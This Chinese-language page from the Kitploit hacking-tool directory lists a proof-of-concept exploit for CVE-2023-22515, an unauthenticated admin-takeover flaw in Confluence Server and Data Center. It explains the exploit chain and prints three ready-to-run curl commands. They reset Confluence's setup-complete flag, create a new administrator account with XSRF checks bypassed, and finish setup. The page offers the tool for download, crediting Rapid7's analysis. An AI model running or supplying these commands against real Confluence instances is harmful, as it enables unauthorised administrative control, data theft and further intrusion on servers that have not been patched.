Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-22515-POC — 针对CVE-2023-22515的概念验证漏洞利用,这是Confluence Server和Data Center中的一个严重错误访问控制漏洞,能够实现未认证的管理员接管。 | Kitploit
工具/GitHubGitHub/j3seer/cve-2023-22515-poc
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试红队
GitHubj3seer/cve-2023-22515-poc

CVE-2023-22515-POC

针对CVE-2023-22515的概念验证漏洞利用,这是Confluence Server和Data Center中的一个严重错误访问控制漏洞,能够实现未认证的管理员接管。

查看仓库
8242年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-22515

CVE-2023-22515,一个影响Confluence Server和Confluence Data Center本地实例的严重漏洞,属于访问控制缺陷漏洞。Attlassian给出的CVSS基础评分为10.0。

利用

简要说明:

1- 由于Xwork拦截器解析参数的方式,/test.action?one=a 等同于 setOne()='a';而 /test.action?one.two=a 等同于 getOne().setTwo()="a"

2- /setup/*端点包含一个@ParameterSafe调用,允许我们使用类似/setup/setupdb.action?dbConfigInfo.databaseType=postgresql的set和get方法,但由于设置已完成,/setup/*端点被阻止,因此可以使用/server-info.action

3- 找到用于完成设置的set方法 => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);

4- 使用X-Atlassian-Token头部绕过XSRF

root@kitploit:~
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

参考

**免责声明:**该利用方法并非由本人发现或编写,功劳归于以下文章

https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

https://blog.s1r1us.ninja/research/brokenconflu

下载工具